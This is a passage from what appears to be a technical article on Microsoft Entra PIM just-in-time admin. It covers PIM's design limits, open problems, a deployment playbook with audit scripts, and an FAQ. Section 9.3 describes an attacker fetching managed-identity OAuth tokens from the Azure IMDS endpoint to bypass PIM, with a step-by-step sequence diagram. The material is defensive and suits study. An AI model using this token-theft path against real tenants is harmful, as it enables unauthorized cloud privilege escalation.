&lt;td&gt;Open source / commercial&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The five methods occupy four positions on the &quot;what is bound&quot; axis: &lt;strong&gt;assignment-state&lt;/strong&gt; (PIM), &lt;strong&gt;session-credential&lt;/strong&gt; (AWS), &lt;strong&gt;policy-binding&lt;/strong&gt; (GCP), and &lt;strong&gt;knowledge-of-credential&lt;/strong&gt; (CyberArk and Vault). The methods are architecturally distinct, and the right enterprise answer in heterogeneous estates is some composition of more than one.&lt;/p&gt;
&lt;p&gt;PIM is the most mature JIT-admin product in the cloud, and it has the most complete coverage of the user-principal surface. The remaining gaps are not about catching up to the competitors; they are about a class of identity the eligible/active model was never designed to gate.&lt;/p&gt;
&lt;h2&gt;9. What the JIT-Admin Pattern Does NOT Close&lt;/h2&gt;
&lt;p&gt;For all the architectural elegance of the two-state assignment object, PIM does not close the JIT-admin problem. It closes a sub-problem, very well, and leaves five structural limits an honest treatment must name.&lt;/p&gt;
&lt;h3&gt;9.1 Standing eligibility is itself standing privilege&lt;/h3&gt;
&lt;p&gt;PIM bounds the &lt;em&gt;active&lt;/em&gt; duration. It does not bound the &lt;em&gt;eligibility&lt;/em&gt; duration. A user with a permanent-eligible Global Administrator assignment is one &lt;code&gt;activate()&lt;/code&gt; call away from the role&apos;s permissions for the next hour. If that user has been phished -- credential plus MFA bypass via a session-cookie capture, say -- the attacker can satisfy the gates. The MFA challenge passes. The justification text is whatever the attacker types. The approval, if required, routes to the legitimate approver, who may approve a legitimate-looking request that actually came from the attacker.&lt;/p&gt;
&lt;p&gt;PIM produces an audit-log record of every step. It does not produce a structural impossibility. Eligibility is itself a security-critical property of the identity, and standing eligibility is the modern analogue of standing membership: a long-lived relationship between principal and role that a successful credential compromise can exercise.&lt;/p&gt;
&lt;h3&gt;9.2 Approver collusion&lt;/h3&gt;
&lt;p&gt;The approval gate is two-phishee resistant only when the requester and approver are independently compromisable. Two-phishee collusion -- the requester and the approver are the same adversary, or two adversaries cooperating -- defeats the workflow at the mechanism layer. The usual mitigations raise the bar: named approvers rather than approver groups (which can be compromised at the group level), CA-gated approval actions, and four-eyes alternatives. None close the class.&lt;/p&gt;
&lt;h3&gt;9.3 The application-identity gap&lt;/h3&gt;
&lt;p&gt;This is the article&apos;s heaviest limit, and it deserves the most space.&lt;/p&gt;
&lt;p&gt;PIM&apos;s eligible-active state machine is currently defined over &lt;code&gt;principal in (user | group)&lt;/code&gt;. Service principals, managed identities, and OAuth consent grants do not flow through PIM activation. Their role assignments are permanent and active by default, and there is no eligible category that applies to them. Microsoft Learn&apos;s documentation for Workload ID Premium and Conditional Access for workload identities makes this explicit: ID Protection workload-identity risk detections cover service principals in single-tenant, non-Microsoft SaaS, and multitenant apps, but &lt;em&gt;&quot;Managed Identities aren&apos;t currently in scope&quot;&lt;/em&gt; [@ms-learn-workload-identity-risk]. Conditional Access for workload identities applies similarly only to service principals owned by the organization, and CA policies &lt;em&gt;&quot;assigned to a group that contains a service principal are not enforced for that service principal&quot;&lt;/em&gt; [@ms-learn-ca-workload-identity].&lt;/p&gt;
&lt;p&gt;Andy Robbins&apos;s three-part &lt;em&gt;Managed Identity Attack Paths&lt;/em&gt; series, published June 6-8, 2022 on the SpecterOps blog, is the canonical demonstration of how this gap is exploited [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3]. The mechanism is direct. An Azure compute resource -- an Automation Account [@robbins-mip-part1], a Logic App [@robbins-mip-part2], or a Function App [@robbins-mip-part3] -- carries an attached managed identity. The managed identity holds standing role assignments at whatever scope the operator granted, often Owner or Contributor on a subscription.&lt;/p&gt;
&lt;p&gt;From inside the resource, any code can fetch an OAuth access token for the managed identity by calling the Azure Instance Metadata Service endpoint at &lt;code&gt;http://169.254.169.254/metadata/identity/oauth2/token&lt;/code&gt;. No human in the loop. No MFA challenge. No PIM activation. The audit log records a service-principal token issuance, not an alice-clicked-Activate event.&lt;/p&gt;

Managed Identity assignments are an extremely effective security control... But Managed Identities introduce a new problem: they can quickly create identity-based attack paths in Azure that may lead to escalation of privilege opportunities. -- Andy Robbins, *Managed Identity Attack Paths, Part 1: Automation Accounts*, June 6, 2022 [@robbins-mip-part1]

An Azure-managed service principal whose credentials are issued and rotated by Azure itself. The underlying Azure resource (a VM, App Service, Function App, Logic App, AKS cluster) retrieves the OAuth access token via the Instance Metadata Service endpoint. Managed identities are not currently in scope for PIM activation; their role assignments are permanent and active [@ms-learn-managed-identities-overview].

The Azure Instance Metadata Service endpoint at `http://169.254.169.254/metadata/identity/oauth2/token`, a link-local non-routable address reachable only from inside the Azure resource itself, that returns an OAuth 2.0 access token for the attached managed identity. The address is the credential: any process running on the resource can fetch the token without storing or presenting any secret.

sequenceDiagram
    autonumber
    participant Attacker
    participant FunctionApp as Compromised Function App
    participant IMDS as IMDS endpoint 169.254.169.254
    participant ARM as Azure Resource Manager
    participant PIMUnused as PIM activation (unused)
    Attacker-&amp;gt;&amp;gt;FunctionApp: Code execution via supply-chain or vuln
    FunctionApp-&amp;gt;&amp;gt;IMDS: GET /metadata/identity/oauth2/token
    IMDS--&amp;gt;&amp;gt;FunctionApp: OAuth access token for managed identity
    FunctionApp-&amp;gt;&amp;gt;ARM: Action as Owner on subscription
    ARM--&amp;gt;&amp;gt;FunctionApp: Action succeeds
    Note over PIMUnused,Attacker: No human, no MFA, no activation, no PIM audit
&lt;p&gt;MITRE ATT&amp;amp;CK maps the class explicitly. &lt;strong&gt;T1078.004 -- Valid Accounts: Cloud Accounts&lt;/strong&gt; cites Robbins&apos;s Part 1 as primary reference for the managed-identity case [@mitre-t1078-004]. The page reads: &lt;em&gt;&quot;In Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to Steal Application Access Tokens to move laterally across the cloud environment&quot;&lt;/em&gt; [@mitre-t1078-004].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;T1548.005 -- Temporary Elevated Cloud Access&lt;/strong&gt; explicitly names PIM as an instance of the JIT-access pattern adversaries abuse: &lt;em&gt;&quot;Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles... Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner&quot;&lt;/em&gt; [@mitre-t1548-005].&lt;/p&gt;

T1548.005 (Temporary Elevated Cloud Access) lists Microsoft&apos;s *Approve just-in-time access requests* documentation as citation [1] of the technique, recognizing PIM as a canonical implementation of the JIT-access pattern adversaries abuse [@mitre-t1548-005]. Being named in the ATT&amp;amp;CK framework is, in the security domain, the most explicit acknowledgement an adversary model can give a defensive product.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Three anchors to walk away with: Andy Robbins&apos;s June 2022 &lt;em&gt;Managed Identity Attack Paths&lt;/em&gt; series [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3]; MITRE ATT&amp;amp;CK T1078.004 citing Robbins as primary [@mitre-t1078-004]; the IMDS endpoint at &lt;code&gt;169.254.169.254&lt;/code&gt; as the technical mechanism [@ms-learn-managed-identities-overview]. If your tenant has any managed identity with Owner or User Access Administrator at a subscription scope, you have an unmediated bypass path around PIM until that role assignment is tightened.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.4 The assignment-bypass is detective, not preventive&lt;/h3&gt;
&lt;p&gt;The High-severity assignment-bypass alert documented in §7 is detective by design (see Aha #2). The structural limit it leaves open is that preventive blocking is not the PIM product&apos;s default: customers who want it layer a Conditional Access policy on the Microsoft Graph endpoint or an Azure Policy at the management-group scope [@ms-learn-azure-policy], accepting that some legitimate Graph integration may need an exception.&lt;/p&gt;
&lt;h3&gt;9.5 Customer-owned PIM policy in CSP and Lighthouse scenarios&lt;/h3&gt;
&lt;p&gt;In the partner-managed case, the customer (not the partner) controls the PIM policy on a delegated authorization [@ms-learn-lighthouse-eligible]. This is the right place to put control, but it is also the place misconfiguration is most common. A customer whose Lighthouse eligible authorization is set with permissive activation policies (no MFA, no approval, large maximum duration) has an unmediated partner activation surface, and the partner cannot tighten the customer-side policy. The MSP-managed case is the operational gotcha most frequently raised at PIM-deployment review boards.&lt;/p&gt;
&lt;h3&gt;Aha #3: The gap is a data-model problem, not a patchable defect&lt;/h3&gt;
&lt;p&gt;This is the third aha moment, and it lands differently from the first two.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The application-identity gap is not a backlog item. Extending the eligible-active state machine from &lt;code&gt;principal in (user | group)&lt;/code&gt; to &lt;code&gt;principal in (user | group | service principal | managed identity | OAuth consent grant)&lt;/code&gt; is a data-model extension that would require changes to the role-assignment object schema, the Microsoft Graph role-management endpoints, the PIM evaluation pipeline, the audit-log schema, the Sentinel detection schema, and every downstream IGA tool. The 2024+ Microsoft responses extend some controls to application identities. They do not yet introduce an eligible/active assignment-category type for application principals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft has shipped partial responses. &lt;strong&gt;Entra Workload ID Premium&lt;/strong&gt; [@ms-entra-workload-id-product] is a separate three-dollar-per-workload-identity-per-month SKU [@ms-entra-workload-id-product] that unlocks &lt;strong&gt;Conditional Access for workload identities&lt;/strong&gt; [@ms-learn-ca-workload-identity] (with the explicit managed-identity exclusion clause) and &lt;strong&gt;ID Protection workload-identity risk detections&lt;/strong&gt; [@ms-learn-workload-identity-risk]. The PIM page on access reviews documents that &lt;em&gt;&quot;Using Access Reviews for Service Principals requires a Microsoft Entra Workload ID Premium plan in addition to a Microsoft Entra ID P2 or Microsoft Entra ID Governance license&quot;&lt;/em&gt; [@ms-learn-pim-access-reviews]. Microsoft&apos;s flagship Ignite 2025 announcement was &lt;strong&gt;Microsoft Entra Agent ID&lt;/strong&gt; for AI agents [@ms-entra-ignite-2025]; the announcement is identity for AI workloads, not an eligible-active type extension for service-principal role assignments.&lt;/p&gt;
&lt;p&gt;Robbins&apos;s class is closed-form within the 2026 PIM architecture. Closing it requires a new architecture, not a patch.&lt;/p&gt;
&lt;p&gt;None of these limits is a defect. Each is a deliberate design boundary, and naming them is the academic honesty the topic deserves. The interesting question: where is active research happening, and what would closing the gap actually look like?&lt;/p&gt;
&lt;h2&gt;10. Open Problems: Where Active Research Is Happening&lt;/h2&gt;
&lt;p&gt;The five limits in section 9 are settled architectural boundaries. The open problems are different. Each is something nobody has shipped a complete solution to as of 2026, but each has named partial results and named anchors.&lt;/p&gt;
&lt;h3&gt;10.1 JIT-gating application identities&lt;/h3&gt;
&lt;p&gt;The data-model extension previewed in section 9&apos;s Aha #3 is the largest open problem in this space, and the one Microsoft is responding to most publicly.&lt;/p&gt;
&lt;p&gt;What has been tried. &lt;strong&gt;Entra Workload ID Premium&lt;/strong&gt; at three dollars per workload identity per month [@ms-entra-workload-id-product]. &lt;strong&gt;Conditional Access for workload identities&lt;/strong&gt;, which lets the tenant block service-principal sign-ins based on IP range, ID-Protection risk score, or authentication context [@ms-learn-ca-workload-identity]. &lt;strong&gt;ID Protection workload-identity risk detections&lt;/strong&gt; that flag suspicious sign-ins, leaked credentials, and admin-confirmed compromise for service principals [@ms-learn-workload-identity-risk]. &lt;strong&gt;Service-principal access reviews&lt;/strong&gt;, gated behind Workload ID Premium plus Entra ID P2 or Governance [@ms-learn-pim-access-reviews]. &lt;strong&gt;Microsoft Entra Agent ID&lt;/strong&gt;, the flagship Ignite 2025 announcement, brings first-class identity to AI agents [@ms-entra-ignite-2025] -- parallel to, but not the same as, an eligible-active type extension on application role assignments.&lt;/p&gt;

An identity used by a software workload to authenticate to other services. In Microsoft Entra ID the term encompasses application objects, service principals, and managed identities [@ms-learn-workload-identities-overview]. As of 2026, workload identities are not in scope of the eligible/active assignment-category model. The 2024+ Workload ID Premium SKU extends sign-in-time controls and risk detection to service principals, but does not yet introduce an eligible category for service-principal role assignments.
&lt;p&gt;What is the conjecture? Closing this gap requires extending the role-assignment object&apos;s &lt;code&gt;principal&lt;/code&gt; axis to include service principals, managed identities, and OAuth consent grants as first-class subjects of the eligible-active state machine. That extension would require a defined &lt;code&gt;activate()&lt;/code&gt; semantics for non-human principals -- itself the hard problem, because the canonical user activation flow assumes an interactive MFA challenge.&lt;/p&gt;
&lt;p&gt;Microsoft Learn states the difficulty bluntly: workload identities &lt;em&gt;&quot;can&apos;t perform multifactor authentication. Often have no formal lifecycle process. Need to store their credentials or secrets somewhere&quot;&lt;/em&gt; [@ms-learn-workload-identities-overview]. The non-interactive case requires either programmatic policy gates (request from this caller, from this IP range, against this entitlement) or a delegation model where a human approver supplies the gate-passing event on the workload&apos;s behalf.&lt;/p&gt;
&lt;h3&gt;10.2 Real-time activation-anomaly blocking&lt;/h3&gt;
&lt;p&gt;The PIM Alert &quot;Roles are being activated too frequently&quot; is post-hoc. It fires after the activation has already occurred and after the count crosses a threshold. The phished-but-still-authentic activation -- the attacker who supplies a valid MFA, a plausible justification, and a real ticket number -- is observationally indistinguishable from a legitimate emergency activation at the mechanism layer. The only signal that distinguishes them must come from behavioural telemetry.&lt;/p&gt;
&lt;p&gt;What has been tried. &lt;strong&gt;Microsoft Defender for Cloud Apps&lt;/strong&gt; ships an out-of-the-box user-and-entity behavioural analytics (UEBA) and machine-learning anomaly-detection layer; the documented policy weighs more than thirty risk indicators across eight risk-factor groups (risky IP, login failures, admin activity, inactive accounts, location, impossible travel, device and user agent, activity rate), with a seven-day initial learning period and a June 2025 transition to a dynamic threat-detection model [@ms-learn-dfca-anomaly]. &lt;strong&gt;Microsoft Sentinel UEBA&lt;/strong&gt; scores anomalies post-event against &lt;code&gt;AuditLogs&lt;/code&gt; operations including role-eligibility additions and activations [@ms-learn-sentinel-ueba]. &lt;strong&gt;Microsoft Defender for Identity&lt;/strong&gt; correlates on-premises and cloud sign-in patterns for behavioural-anomaly detection. Neither Sentinel UEBA nor Defender for Cloud Apps is a synchronous gate. Both are detective layers that fire after the activation event has already created consequences.&lt;/p&gt;
&lt;p&gt;The academic upper bound for what character-level and LSTM detectors achieve on adjacent tasks comes from Hendler, Kels, and Rubin&apos;s 2019 work on AMSI-based detection of malicious PowerShell code, which reports a true-positive rate of nearly 90% at a false-positive rate of less than 0.1% on the PowerShell-misuse classification problem [@arxiv-hendler-1905]. That is the ceiling a probabilistic activation-anomaly classifier could approach. It is not enough to gate synchronously without false-positive operational pain, which is why the deployed surface is post-hoc UEBA scoring rather than pre-commit blocking.&lt;/p&gt;
&lt;p&gt;The conjecture. Synchronous gating on behavioural signal at activation time would require Conditional Access (or its successor) to subscribe to an activation-event hook and consume a risk score from ID Protection, Defender for Cloud Apps, or Sentinel UEBA in the few hundred milliseconds before PIM materializes the active assignment. The architectural primitives exist; the synchronous risk-evaluation hook does not yet ship.&lt;/p&gt;
&lt;h3&gt;10.3 Hybrid-bridge JIT&lt;/h3&gt;
&lt;p&gt;A single approval workflow spanning the on-premises (MIM PAM / shadow principals) and cloud (Entra PIM) boundaries is not a shipping product. Microsoft has &lt;strong&gt;Entra Cloud Sync&lt;/strong&gt; and &lt;strong&gt;Entra Connect&lt;/strong&gt; for directory synchronization; neither bridges the &lt;em&gt;activation workflow&lt;/em&gt;. MIM 2016 is on extended support through January 9, 2029 [@ms-learn-mim-2016]; Microsoft Learn states the path forward is cloud-first PIM with on-prem AD progressively scoped down to the few resources that cannot move [@ms-learn-mim-pam-overview].&lt;/p&gt;

MIM 2016 PAM is in extended support, not active development, and Microsoft Learn explicitly states it is &quot;not recommended for new deployments in Internet-connected environments&quot; [@ms-learn-mim-pam-overview]. SP3 ships compatibility updates for SharePoint SE, Exchange SE, and SQL Server 2022 [@ms-learn-mim-2016], but the product line is in maintenance posture. The on-premises half of a hybrid-bridge JIT story requires a different architectural choice than re-investing in MIM.
&lt;h3&gt;10.4 Coverage-as-code&lt;/h3&gt;
&lt;p&gt;How do you evaluate PIM policy coverage in CI/CD for a tenant with two hundred custom Azure roles and fifty directory roles, and gate every PR that touches the role-management policies?&lt;/p&gt;
&lt;p&gt;Best partial results. &lt;strong&gt;Microsoft Cloud Security Benchmark v3 Privileged Access controls&lt;/strong&gt; (PA-1, PA-2, ...) give Boolean per-recommendation pass/fail evaluation [@ms-learn-mcsb-v3-pa] -- close, but per-recommendation Boolean rather than composable policy. The PowerShell cmdlets &lt;code&gt;Get-MgPolicyRoleManagementPolicy&lt;/code&gt; and &lt;code&gt;Get-MgPolicyRoleManagementPolicyAssignment&lt;/code&gt; read role-management policies via Microsoft Graph; the cmdlets ship in the &lt;code&gt;Microsoft.Graph.Identity.SignIns&lt;/code&gt; module, despite the Identity Governance branding [@ms-learn-graph-pim-policy-cmdlet].The PIM role-management-policy cmdlets are commonly mis-attributed to the &lt;code&gt;Microsoft.Graph.Identity.Governance&lt;/code&gt; PowerShell module because of the Identity Governance branding. They are actually in &lt;code&gt;Microsoft.Graph.Identity.SignIns&lt;/code&gt;. The &lt;code&gt;Import-Module&lt;/code&gt; line that gets the cmdlets into scope is &lt;code&gt;Import-Module Microsoft.Graph.Identity.SignIns&lt;/code&gt; [@ms-learn-graph-pim-policy-cmdlet]. The &lt;strong&gt;EntraOps Privileged EAM&lt;/strong&gt; community project on GitHub, maintained by Thomas Naunheim, demonstrates the &quot;track changes and history of privileged principals and their assignments as code&quot; idiom against the Enterprise Access Model classification [@entraops-github]. Azure Policy itself operates on Azure resource configurations and does not directly evaluate PIM role-management policy state [@ms-learn-azure-policy], which is the data-model gap that drives the GitOps-flavoured drift-detection community pattern.&lt;/p&gt;
&lt;p&gt;{`
// Take an array of role-management policy assignments
// (the kind Get-MgPolicyRoleManagementPolicyAssignment returns)
// and assert tenant-wide PIM coverage invariants.&lt;/p&gt;
&lt;p&gt;function assertPrivilegedRoleCoverage(assignments, privilegedRoles, expected) {
  const findings = [];
  for (const role of privilegedRoles) {
    const a = assignments.find(x =&amp;gt; x.roleDefinitionId === role);
    if (!a) {
      findings.push({ role, severity: &apos;High&apos;, issue: &apos;No PIM policy assignment&apos; });
      continue;
    }
    const p = a.policy;
    if (p.requires_mfa !== expected.requires_mfa)
      findings.push({ role, severity: &apos;High&apos;, issue: &apos;MFA at activation not required&apos; });
    if (p.requires_approval !== expected.requires_approval)
      findings.push({ role, severity: &apos;High&apos;, issue: &apos;Approval not required&apos; });
    if (p.requires_justification !== expected.requires_justification)
      findings.push({ role, severity: &apos;Medium&apos;, issue: &apos;Justification not required&apos; });
    if (p.max_duration_hours &amp;gt; expected.max_duration_hours)
      findings.push({ role, severity: &apos;Medium&apos;,
        issue: &apos;Maximum activation duration exceeds expected value&apos;,
        actual: p.max_duration_hours, expected: expected.max_duration_hours });
  }
  return findings;
}&lt;/p&gt;
&lt;p&gt;const privileged = [&apos;Global Administrator&apos;, &apos;Privileged Role Administrator&apos;,
                    &apos;Security Administrator&apos;, &apos;User Access Administrator&apos;];
const expected = { requires_mfa: true, requires_approval: true,
                   requires_justification: true, max_duration_hours: 1 };
const sample = [{ roleDefinitionId: &apos;Global Administrator&apos;,
  policy: { requires_mfa: true, requires_approval: true,
            requires_justification: true, max_duration_hours: 4 } }];
console.log(assertPrivilegedRoleCoverage(sample, privileged, expected));
`}&lt;/p&gt;
&lt;p&gt;The conjecture. A full coverage-as-code primitive needs Azure Policy (or its successor) to evaluate PIM role-management policy state with the same first-class semantics it applies to Azure resource configuration. That extension would let a tenant declare an invariant -- &quot;every role in the control plane has &lt;code&gt;requires_mfa=true&lt;/code&gt; and &lt;code&gt;max_duration_hours &amp;lt;= 1&lt;/code&gt;&quot; -- and have the platform enforce it continuously across drift, the way Azure Policy already enforces resource invariants.&lt;/p&gt;
&lt;h3&gt;10.5 Adaptive-cadence eligibility reviews&lt;/h3&gt;
&lt;p&gt;Should eligible membership be access-reviewed at higher cadence than active assignments? Eligible membership is standing privilege; active membership is bounded. The argument for adaptive cadence -- reviewing eligibility more frequently when behavioural signals or organizational events suggest the principal may no longer need the role -- is intuitive but mechanically unshipped.&lt;/p&gt;
&lt;p&gt;Best partial result. The 2024+ ML-based access-review recommendations [@ms-learn-review-recommendations] -- inactive-user 30-day Deny, user-to-group-affiliation Deny -- are &lt;em&gt;within-cycle&lt;/em&gt; reviewer-assist features. They help reviewers decide during a configured access review. They are not &lt;em&gt;cross-cycle&lt;/em&gt; adaptive-cadence triggers that fire a new review off-schedule when conditions warrant.&lt;/p&gt;
&lt;p&gt;These are research problems. The practitioner does not have the luxury of waiting for them to be solved. What does Monday morning look like for the architect who has read this far and now has to deploy?&lt;/p&gt;
&lt;h2&gt;11. Practical Guide: Monday Morning for the 2026 Tenant Architect&lt;/h2&gt;
&lt;p&gt;You have read ten thousand words. You are responsible for a Microsoft 365 tenant that audits against SOX, SOC 2, and ISO 27001. You have a budget for Entra ID P2 (or Entra ID Governance) per privileged user. What do you do on Monday?&lt;/p&gt;
&lt;p&gt;Work in this order. The list is ordered by cost-to-impact, with the cheapest, highest-impact items first.&lt;/p&gt;
&lt;h3&gt;Step 1: Baseline the Tier-0 surface&lt;/h3&gt;
&lt;p&gt;Every directory role at &quot;Privileged&quot; classification or above should be PIM-eligible-only. The exceptions are the two emergency-access permanent-active Global Administrator accounts (break-glass), which we return to in Step 4.&lt;/p&gt;
&lt;p&gt;Activation requires MFA, approval, justification, and ticket number for control-plane and management-plane roles. Maximum activation duration is one hour for Global Administrator and Privileged Role Administrator, and four hours for less-privileged roles. Configure per role per scope; remember that PIM-for-Azure-Resources policies do not inherit.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Import-Module Microsoft.Graph.Identity.Governance
Connect-MgGraph -Scopes &apos;RoleManagement.Read.Directory&apos;,&apos;User.Read.All&apos;
$gaRoleId = (Get-MgRoleManagementDirectoryRoleDefinition `
    -Filter &quot;displayName eq &apos;Global Administrator&apos;&quot;).Id
Get-MgRoleManagementDirectoryRoleAssignment `
    -Filter &quot;roleDefinitionId eq &apos;$gaRoleId&apos;&quot; `
    -ExpandProperty Principal |
    Select-Object @{n=&apos;User&apos;;e={$_.Principal.AdditionalProperties.userPrincipalName}}, RoleDefinitionId
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This lists every standing-active Global Administrator in the tenant. Compare against your break-glass roster and your active PIM activations. Anything else is technical debt.&lt;/p&gt;
&lt;h3&gt;Step 2: Configure access reviews&lt;/h3&gt;
&lt;p&gt;Quarterly for Tier-0 and control-plane roles. Semi-annually for Tier-1 and management-plane. Annually for Tier-2 and data/workload-plane [@ms-learn-pim-access-reviews]. Turn on the ML-based review recommendations: the 30-day inactive-user Deny recommendation is the reviewer-assist baseline, and the user-to-group-affiliation Deny recommendation helps reviewers spot principals who are organizationally distant from the rest of the group&apos;s membership [@ms-learn-review-recommendations].&lt;/p&gt;
&lt;h3&gt;Step 3: Turn on every PIM Alert and tune the GA-count threshold&lt;/h3&gt;
&lt;p&gt;Enable all six behavioural PIM Alerts. Tune the &quot;There are too many Global Administrators&quot; alert to a minimum count of two and a percentage of 50% [@ms-learn-pim-alerts]. The expected steady-state count is &quot;fewer than five standing GAs, most of which are break-glass.&quot; The High-severity assignment-bypass alert is non-negotiable; route it to a 24x7 SOC queue with an incident-response runbook.Microsoft Secure Score&apos;s &quot;Limit the number of Global Administrators&quot; recommendation targets fewer than five standing GAs as the canonical baseline.&lt;/p&gt;
&lt;h3&gt;Step 4: Break-glass discipline&lt;/h3&gt;
&lt;p&gt;Two emergency-access permanent-active Global Administrator accounts. Not one, not three.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; One break-glass account is a single point of failure: if it is locked, lost, or compromised, the tenant has no emergency entry path. Three or more begin to expand the blast radius unnecessarily. Two balances the two failure modes. &lt;a href=&quot;https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/&quot; rel=&quot;noopener&quot;&gt;FIDO2 hardware keys&lt;/a&gt;, stored in physical safes, with continuous sign-in alerting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Conditional Access policies can lock you out. Break-glass accounts must be excluded from every CA policy that could prevent their sign-in. Compensate with continuous sign-in alerting on every break-glass authentication event; alerts are the substitute for the gate you are deliberately removing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Step 5: Extend PIM to the four boundaries&lt;/h3&gt;
&lt;p&gt;PIM-for-Groups: gate &lt;strong&gt;ownership&lt;/strong&gt; of every directory-role-assignable group, every privileged-access security group, and every group that grants management-group-level Azure RBAC. Membership alone is insufficient; ownership is a backdoor to membership.&lt;/p&gt;
&lt;p&gt;PIM-for-Azure-Resources: gate Owner, User Access Administrator, and Contributor at the management-group scope, then explicitly at every subscription, every resource group, and every resource where the role is assignable. Inheritance does not flow; configure per scope.&lt;/p&gt;
&lt;p&gt;GDAP and Lighthouse: every CSP partner authorization must be eligible, not active. Set the customer-side PIM policy explicitly. Audit annually.&lt;/p&gt;
&lt;p&gt;PIM with Conditional Access: attach an authentication-context tag to activation policies on the privileged Entra roles. Add a CA policy that requires a compliant device and a fresh MFA challenge on activation. The activation gate becomes structurally tighter than the sign-in gate, which is the correct ordering for high-privilege actions.&lt;/p&gt;
&lt;h3&gt;Step 6: Continuous detection&lt;/h3&gt;
&lt;p&gt;Pipe PIM activation events (via Microsoft Graph audit logs, surfaced in the &lt;code&gt;AuditLogs&lt;/code&gt; and &lt;code&gt;MicrosoftGraphActivityLogs&lt;/code&gt; Azure Monitor tables) to your SIEM. Cross-correlate with Entra ID Protection sign-in risk and Microsoft Sentinel UEBA anomaly signals [@ms-learn-sentinel-ueba]. KQL templates to write: (a) GA activations outside business hours; (b) activations from non-compliant devices; (c) the assignment-bypass alert correlated with the activating principal&apos;s recent sign-in risk score; (d) managed-identity token issuance against subscription-scoped Owner.&lt;/p&gt;
&lt;h3&gt;Step 7: Mind the application-identity surface&lt;/h3&gt;
&lt;p&gt;This is the longest-running open item. Inventory every managed identity in the tenant. For each, document the role assignment, the scope, and the resource that holds it.&lt;/p&gt;
&lt;p&gt;Apply the &quot;Owner and User Access Administrator at subscription scope is dangerous&quot; rule first; tighten those to Contributor or a custom role wherever possible. Where a managed identity must hold a high-privilege role at a high scope, treat the underlying resource (Function App, Logic App, VM, AKS cluster) as a Tier-0 asset for the purposes of patching, network exposure, and code-review process. Until PIM gates application identities natively, the Tier-0-asset framing is the substitute control.&lt;/p&gt;
&lt;p&gt;That is the playbook for the user-principal side of the JIT-admin problem. The application-identity side is still being written. The next iteration of this material will be about the data-model extension that closes Robbins&apos;s gap, or the architectural successor that arrives in its place.&lt;/p&gt;
&lt;h2&gt;12. Frequently Asked Questions and Closing&lt;/h2&gt;
&lt;p&gt;Three classes of question come up every time this material is taught. The first is conceptual (&quot;what does eligible actually mean?&quot;). The second is operational (&quot;do I need MFA?&quot;). The third is adversarial (&quot;what about managed identities?&quot;). Each appears below.&lt;/p&gt;

No. Eligible assignments are permanent in most tenants -- they are the standing relationship between principal and role -- but they grant no privilege until you activate. Only the *active* state is bounded. Your admin rights still exist; they are simply not exercised continuously [@ms-learn-pim-configure].

Only if the role&apos;s activation policy is configured to require it. PIM&apos;s activation gates -- MFA at activation, approval, justification, ticket number, and activation maximum duration -- are per-role, per-scope flags the tenant sets independently. A role with `requires_mfa=false` and `requires_approval=false` is a valid (if loose) PIM configuration [@ms-learn-pim-change-default-settings].

One hour for the highest-privileged Entra directory roles, including Global Administrator and Privileged Role Administrator. The configurable range is one to twenty-four hours per role per scope [@ms-learn-pim-change-default-settings]. Tighten where you can; the activation cost is small, the standing-active surface saving is large.

No. Conditional Access gates the sign-in event. PIM bounds the assignment state. A compromised CA-gated GA still has GA privileges once they sign in -- the gate that mattered (activation) was never traversed. CA and PIM compose; PIM is not a substitute for CA, and CA is not a substitute for PIM.

No. PIM alerts via the High-severity &quot;Roles are being assigned outside of Privileged Identity Management&quot; alert when a direct assignment happens [@ms-learn-pim-alerts]. The detection is intentional rather than preventive: blocking direct assignment would break the Microsoft Graph integration surface every legitimate administrative tool uses. Preventive controls -- Conditional Access on the Graph endpoint, Azure Policy at the management-group scope, or entitlement-management workflows -- are added separately based on the tenant&apos;s tooling estate.

No. PIM&apos;s eligible/active state machine is defined over user and group principals. Service principals, managed identities, and OAuth consent grants route around PIM activation entirely. Andy Robbins&apos;s June 2022 *Managed Identity Attack Paths* series [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3] is the canonical demonstration; MITRE ATT&amp;amp;CK T1078.004 [@mitre-t1078-004] cites Robbins as primary reference. Workload ID Premium plus Conditional Access for workload identities extends sign-in-time controls to service principals (with managed identities still excluded), but does not yet introduce an eligible category for workload-identity role assignments [@ms-learn-ca-workload-identity], [@ms-learn-workload-identity-risk].

Microsoft has shifted the framing to the Enterprise Access Model: control plane, management plane, and data/workload plane [@ms-learn-eam]. The retirement of Tier-0/1/2 is partial; the practitioner community still uses the legacy terms day to day. The underlying principle -- privilege boundaries you do not cross with a single credential -- is preserved across both framings.
&lt;h3&gt;Closing&lt;/h3&gt;
&lt;p&gt;Read the section 1 vignette again. The 2026 tenant where &lt;a href=&quot;mailto:alice@contoso.com&quot; rel=&quot;noopener&quot;&gt;alice@contoso.com&lt;/a&gt; is Global Administrator for exactly one hour, with an audit log so complete the SOC 2 auditor signs it without questions, is not a configuration choice. It is the visible behaviour of an identity system whose role-assignment object carries one more field than the 2015 version did. Standing admin did not retire because operators got more disciplined. Standing admin retired because the data model grew a second state.&lt;/p&gt;
